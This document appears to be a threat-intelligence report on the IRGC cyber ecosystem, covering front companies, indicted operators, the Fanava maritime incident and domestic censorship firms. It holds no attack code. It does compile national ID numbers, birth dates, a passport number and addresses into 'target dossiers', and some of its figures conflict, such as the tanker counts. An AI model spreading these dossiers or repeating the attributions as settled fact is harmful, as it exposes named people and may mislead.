IRGC CYBER ECOSYSTEM
FORENSIC INTELLIGENCE REPORT 2014-2026
From the "Contractor Model" to Cyber–Kinetic Convergence
LAST UPDATED: JANUARY 2026
Intelligence Assessment: This forensic report contains actionable intelligence on the IRGC offensive cyber ecosystem, including corporate fronts, operators, and state-aligned contractors engaged in cyber-enabled kinetic operations.
TABLE OF CONTENTS
01Why This Ecosystem Matters
Modern cyber conflict is not just about code. It is sustained by a human, organizational, and corporate backbone. What stands out from late 2024 through January 2026 is a clear shift: the IRGC and MOIS are no longer content with a neat separation between "espionage," "propaganda," and "disruption." Instead, they are pushing a doctrine of cyber-enabled kinetic operations.
At the same time, hacktivist disclosures (notably Lab Dookhtegan and Read My Lips), publicly unsealed indictments in September 2024, and sanctions against cyber contractors have made it possible to outline "who does what" inside the ecosystem.
Strategic Escalation: IRGC Cyber Operations Timeline
(Q4 2024 – Jan 2026)
U.S. DOJ indicts APT42 members (incl. Masoud Jalili) for compromising Trump campaign staff
Trump campaign emails distributed to media outlets via "Robert" persona
Fanava Group infiltrated, disrupting operations for 39 tankers and 25 cargo ships
"Red Wave" analysis reveals 116 tankers compromised via deleted Falcon VSAT terminals
Second wave findings confirm use of dd command to wipe vessel storage partitions
Ali Aliakbar Ansari designated by UK for financing hostile IRGC destabilization activities
02Command Architecture
The IRGC's offensive capabilities generally draw from two major lines:
- •IRGC Intelligence Organization (IRGC-IO): domestic repression, counterintelligence, and targeting opposition abroad; cyber activity often emphasizes social engineering, credential theft, and communications monitoring.
- •IRGC Electronic Warfare & Cyber Defense Organization (IRGC-EWCD): despite the "defense" label, it is frequently associated with operations aimed at sensitive infrastructure and strategic targets.
Cyber is no longer a nuisance tool; it is increasingly integrated into core regime objectives.
IRGC Cyber Proxy Network: Command and Control Structure
Figure 1: The operational hierarchy linking the IRGC Intelligence Organization (IRGC-IO) to its primary front companies.
03The Contractor Model & Corporate Mask
A central finding is the IRGC's institutionalized Contractor Model: legally registered, pseudo-private entities execute state-directed operations and, in some instances, participate in financially motivated cybercrime—an arrangement often described as "state-tolerated moonlighting."
Three recurring nodes in this model:
- •Najee Technology Hooshmand Fater LLC
- •Afkar System Yazd Company
- •Emennet Pasargad and earlier brand names
| Company | Corporate National ID | Reg. No. | Address | Postal Code |
|---|---|---|---|---|
| Najee Technology Hooshmand Fater | 14008335397 | 36157 | Karaj, Rajaee Shahr, Phase 3... | 3146815441 |
| Afkar System Yazd | 10860176637 | — | Yazd, Central Area, 31st Alley... | 8916984626 |
| Emennet Pasargad | — | — | Tehran (details changed over time) | — |
04The Human Layer: Executives & Operators
This ecosystem ultimately runs on people: executives who manage the corporate cover and operators who conduct intrusion, persistence, and data collection.
Leadership & Management
| Name (English) | Name (Farsi) | Role | DOB | National ID | Place of Birth |
|---|---|---|---|---|---|
| Mansour Ahmadi | منصور احمدی | Managing Director, Najee | 07 Jul 1988 | 0453740243 | Shemiran, Tehran |
| Ahmad Khatibi Aghda | احمد خطیبی عقدا | Managing Director, Afkar | 21 Mar 1977 | — | Ardakan, Yazd |
Mansour Ahmadi represents a younger cohort of trusted technical managers; Ahmad Khatibi Aghda is older and may bridge traditional command layers and younger technical teams.
Operatives & Facilitators
| Name (English) | Name (Farsi) | DOB | National ID | Passport | Place of Birth |
|---|---|---|---|---|---|
| Amir Hossein Nikaeen Ravari | امیرحسین نیکآئین راوری | 13 Apr 1992 | 4480046429 | — | Meybod, Yazd |
| Aliakbar Rashidi-Barjini | علیاکبر رشیدی بارجینی | 30 Apr 1991 | 4480034870 | — | Meybod, Yazd |
| Mohammad Shakeri-Ashtijeh | محمد شاکری اشتیجه | 28 Nov 1997 | 0371588723 | B50759562 | Qom |
| Mojtaba Haji Hosseini | مجتبی حاجی حسینی | 1991 | 4480031332 | — | Meybod, Yazd |
| Mostafa Haji Hosseini | مصطفی حاجی حسینی | 1991 | 4480031340 | — | Meybod, Yazd |
| Mohammad Agha Ahmadi | محمد آقااحمدی | 01 Mar 1995 | 4890244441 | — | Savojbolagh, Alborz |
| Ali Agha-Ahmadi | علی آقااحمدی | — | 4899768060 | — | Savojbolagh, Alborz |
Early-to-mid 1990s birth years and geographic clustering (notably Yazd/Meybod) point to localized recruitment around specific contractors.
05APT42 / Mint Sandstorm & September 2024 Indictments
The cluster tracked as APT42 / Mint Sandstorm is characterized as a highly targeted, HUMINT-aligned capability: interactive social engineering, credible professional personas, and precise targeting of individuals and campaigns.
The 2024 U.S. Election Operation
In unsealed September 2024 charging documents, three individuals were accused of executing a targeted hacking campaign against email accounts associated with the U.S. presidential election (with specific attention on the Donald Trump campaign) and then attempted to move stolen material into political and media circulation.
Indicted Operators
| Name | Operational Description | DOB | Place of Birth | Aliases / Notes | Status |
|---|---|---|---|---|---|
| Masoud Jalili | Access acquisition; alias: "1028" | 08 Dec 1987 | Tehran | Birth Cert No: 49332 | Indicted; sanctioned |
| Seyyed Ali Aghamiri | Social engineering / infrastructure | 24 Jun 1990 | Tehran | Black hair, hazel eyes | Indicted Sep 2024 |
| Yaser Balaghi | Technical intrusion support | 19 Sep 1988 | Tehran | Wool3n.H4t; ~2014 (Rocket Kitten) | Indicted Sep 2024 |
Target Dossier: Indicted Mint Sandstorm Operatives (Sep 2024)
Personal Identifiable Information (PII) for the three primary Mint Sandstorm operatives indicted for the 2024 Trump Campaign hack.
MASOUD JALILI
Aliases: Masud Jalili, Mas'ud Jalili, "1028"
SEYYED ALI AGHAMIRI
YASER BALAGHI
Aliases: Wool3n.H4t; ~2014 (Rocket Kitten)
06Contractor Lineage: Emennet Pasargad
To understand the present, you have to trace the earlier contractor lineage:
- •Emennet Pasargad (and earlier names) is described as a key precedent for the Contractor Model and was associated with earlier election interference (2020).
- •Behzad Mesri (alias: Skote Vahshat) and the 2017 HBO incident illustrate a hybrid profile: criminal extortion alongside analytical proximity to state-aligned clusters.
| Name | Alias | DOB | Place of Birth | National ID | Analytical Note |
|---|---|---|---|---|---|
| Behzad Mesri | Skote Vahshat | 26 Aug 1988 | Naghadeh | 2909905624 | Hybrid threat: financial crime + state ties |
07Hacktivist Counter-Intelligence
On the opposing side, hacktivist activity has imposed real operational friction by exposing identities and contractor data.
Psychological pressure and forced personnel rotation and corporate restructuring—especially through disclosures tied to Najee and related clusters such as "Sahand."
08Cyber to Kinetic: The Fanava Incident
Cyber–kinetic convergence becomes concrete when digital access produces operational, physical-world consequences.
The Fanava Group Incident (August 2025)
A supply-chain compromise involving Fanava Group reportedly resulted in the removal or disabling of Falcon software across systems connected to maritime platforms. The stated outcome: disruption affecting 116 vessels (including 39 tankers and 25 cargo ships).
Examples of disclosed internal structure (directory names):
- •mitarbeiter (employee records)
- •admin-login (administrator login data)
- •fanava-payments (payment/transaction logs)
- •acceptor-contacts (merchant/customer contact data)
- •shahrestans (geographic/service coverage data)
Kinetic-Aligned Clusters
- •Tortoiseshell (Imperial Kitten / Crimson Sandstorm / TA456): focusing on operational preparation (OPE), AIS mapping, and even CCTV access.
- •Hexane (Lyceum / MarnanBridge): telecom/energy focus with a supply-chain orientation.
09Domestic Control: Companies & Surveillance
Domestic control is the second major pillar: firms enabling filtering, DPI, VPN suppression, and influence operations.
Key Firms and Executives
| Company | Role | Key Executive | Title | Location |
|---|---|---|---|---|
| Sahab Pardaz | Social media filtering, DPI, censorship | Mohammad Zandi Aliabadi | Chair | Tehran |
| Sahab Pardaz | — | Hossein Zandi Aliabadi | Vice Chair | Tehran |
| Sahab Pardaz | — | Fatemeh Haghshenas | CEO | Tehran |
| Douran Software | VPN blocking, content control | Alireza Abedinejad | CEO | Tehran |
| Douran Software | — | Amer Najafianpour | Chair | Tehran |
| Douran Software | — | Soheila Kasaei | Vice Chair | Tehran |
| Ravand Cybertech | Influence ops; attributed to MOIS | (entity-level) | — | Toronto |
Reported Sahab Pardaz office locations:
- •Tehran, Khorramshahr St., No. 22
- •Tehran, North Shohvardi St., Khorramshahr St., No. 24, Floor 1
Surveillance-Ready Platforms
- •Rubika: described as a domestic "super-app" with an ownership/influence chain (Tosca → MCI → TCI).
- •Soroush Plus: developed by Setak Houshmand Sharif and attributed to the state broadcaster.
10Military-Academic Integration: MUT
MUT is described as a key R&D node connected to MODAFL, spanning cyber defense, cryptography, and sensitive technologies.
Named figures:
- •Ebrahim Mahmudzadeh: MUT faculty; TCI board chair; former CEO of Iran Electronic Industries (IEI)
- •Mohammad Shakibazad: cyber defense / smart cards / risk management
- •Also: Moslem Najafi, Ali Jabar Rashidi, Mohsen Shekarbaigi
- •Fatemeh Ganji: PUFs research (hardware security)
11Financial & Strategic Enablers
Cross-border operations require finance and logistics.
| Name | Function | Key Details | DOB | Place of Birth |
|---|---|---|---|---|
| Ali Aliakbar Ansari | Financial/logistics node | Passports: Iran, St Kitts, Cyprus; Dubai | 26 Dec 1968 | Ghazvin |
| Ali Hoseynitash | Strategic command | IRGC BG; head of SNSC strategic dept | — | — |
| Mojtaba Haeri | Industrial oversight | MODAFL industrial deputy; AIO/DIO | — | — |
| Nader Saedi | Legacy threat | Sun Army / Mersad | — | — |
| Mostafa Sadeghi | Legacy threat | Mabna Institute | — | — |
12Tradecraft & TTPs
The dominant pattern is rapid exploitation of publicly known vulnerabilities (N-day) rather than expensive zero-days.
Common motifs include:
- •Unpatched VPN and mail server targeting: Fortinet FortiOS, Microsoft Exchange (ProxyShell), Log4j
- •Ransomware using legitimate tooling: BitLocker as a "living off the land" approach
- •Infrastructure: reliance on leased VPS for command-and-control
- •Interactive social engineering: credible personas (journalist/researcher) and long rapport-building
13Closing Assessment
As of early 2026:
- •The IRGC cyber ecosystem is increasingly integrated with kinetic objectives and political warfare (maritime disruption and election operations).
This is not just "data theft." It is a blended model of human-centric intrusion, political influence operations, cyber-to-operations effects, and tech-enabled domestic control.
END OF REPORT